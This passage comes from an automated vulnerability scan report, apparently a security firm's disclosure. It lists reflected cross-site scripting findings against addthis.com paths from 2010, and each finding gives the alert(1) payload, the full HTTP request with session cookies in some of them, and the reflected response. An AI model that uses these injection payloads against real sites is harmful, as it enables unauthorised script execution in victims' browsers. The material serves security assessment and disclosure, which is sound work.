The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 278d6"-alert(1)-"ce0f54c8f21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico278d6"-alert(1)-"ce0f54c8f21 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: www.addthis.com
Proxy-Connection: Keep-Alive
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=15fm6nh0l1cvvqskakcu5rumi5; Coyote-2-a0f0083=a0f021f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:10:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/favicon.ico278d6"-alert(1)-"ce0f54c8f21";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.97. http://www.addthis.com/labs/sharebar [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a74f<script>alert(1)</script>b715ff394f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labs2a74f<script>alert(1)</script>b715ff394f5/sharebar HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=r1uiniigtcm2o9665dceg3l7a1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1475
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>labs2a74f<script>alert(1)</script>b715ff394f5/sharebar</strong>
...[SNIP]...

2.98. http://www.addthis.com/labs/sharebar [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98e40"-alert(1)-"f69a97632a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /labs98e40"-alert(1)-"f69a97632a6/sharebar HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=s25hh7o8aj9hivfipoa2r9g376; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1449
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/labs98e40"-alert(1)-"f69a97632a6/sharebar";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker =
...[SNIP]...

2.99. http://www.addthis.com/labs/sharebar [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 22a81<script>alert(1)</script>017d8df923a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labs/sharebar22a81<script>alert(1)</script>017d8df923a HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=9505qf7soqfl8tp9tjhbvrnva0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1475
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>labs/sharebar22a81<script>alert(1)</script>017d8df923a</strong>
...[SNIP]...

2.100. http://www.addthis.com/labs/sharebar [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea60"-alert(1)-"fb95837da68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /labs/sharebarbea60"-alert(1)-"fb95837da68 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=t0jjtrn86ervt30up9qccjvna3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1449
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/labs/sharebarbea60"-alert(1)-"fb95837da68";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.101. http://www.addthis.com/labs/sharebar/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48c30<script>alert(1)</script>97c119f9d4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labs48c30<script>alert(1)</script>97c119f9d4c/sharebar/ HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=gumktcoa631jau9eq58bo3a6n4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1477
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>labs48c30<script>alert(1)</script>97c119f9d4c/sharebar/</strong>
...[SNIP]...

2.102. http://www.addthis.com/labs/sharebar/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c93"-alert(1)-"015370cd7b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /labsc3c93"-alert(1)-"015370cd7b1/sharebar/ HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=4vvuq8gvavofrrm6aajh0vbc10; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1451
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/labsc3c93"-alert(1)-"015370cd7b1/sharebar/";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker =
...[SNIP]...

2.103. http://www.addthis.com/labs/sharebar/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b79e<script>alert(1)</script>6e72fe07aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labs/sharebar2b79e<script>alert(1)</script>6e72fe07aab/ HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=4o1js9c6qoqlapr84rrevdmjm7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1477
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>labs/sharebar2b79e<script>alert(1)</script>6e72fe07aab/</strong>
...[SNIP]...

2.104. http://www.addthis.com/labs/sharebar/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /labs/sharebar/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab65"-alert(1)-"a907e3ac5d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /labs/sharebar8ab65"-alert(1)-"a907e3ac5d9/ HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=0mcpu733knmj17rqsvpush0ek3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1451
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/labs/sharebar8ab65"-alert(1)-"a907e3ac5d9/";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._ge
...[SNIP]...

2.105. http://www.addthis.com/services/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b687"-alert(1)-"5544c0af5fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services6b687"-alert(1)-"5544c0af5fb/submit HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ro0pprbgg02gv0ps8843aufqj2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1453
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services6b687"-alert(1)-"5544c0af5fb/submit";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _g
...[SNIP]...

2.106. http://www.addthis.com/services/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d48f3<script>alert(1)</script>7fec965f9fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servicesd48f3<script>alert(1)</script>7fec965f9fb/submit HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=u4ab98dm5nk5ev3e48a1bl69a7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1479
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>servicesd48f3<script>alert(1)</script>7fec965f9fb/submit</strong>
...[SNIP]...

2.107. http://www.addthis.com/services/submit [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f28ad"-alert(1)-"9b939b22c7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submitf28ad"-alert(1)-"9b939b22c7d HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=epv9ku1jg9s8m3t3j94jsm1c34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1453
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submitf28ad"-alert(1)-"9b939b22c7d";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.108. http://www.addthis.com/services/submit [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 57fdb<script>alert(1)</script>57c7a554130 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb<script>alert(1)</script>57c7a554130 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=r6d67jvi441r6bg5srbf399u47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1479
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb<script>alert(1)</script>57c7a554130</strong>
...[SNIP]...

2.109. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12552"-alert(1)-"62b69e85072 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services12552"-alert(1)-"62b69e85072/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.2.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services12552"-alert(1)-"62b69e85072/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combinat
...[SNIP]...

2.110. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ab00<script>alert(1)</script>7d42c08a525 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services2ab00<script>alert(1)</script>7d42c08a525/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.2.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services2ab00<script>alert(1)</script>7d42c08a525/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC</strong>
...[SNIP]...

2.111. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75a7b"-alert(1)-"0a892740684 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C75a7b"-alert(1)-"0a892740684/script%3EHOYT-LLC-XSS-POC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
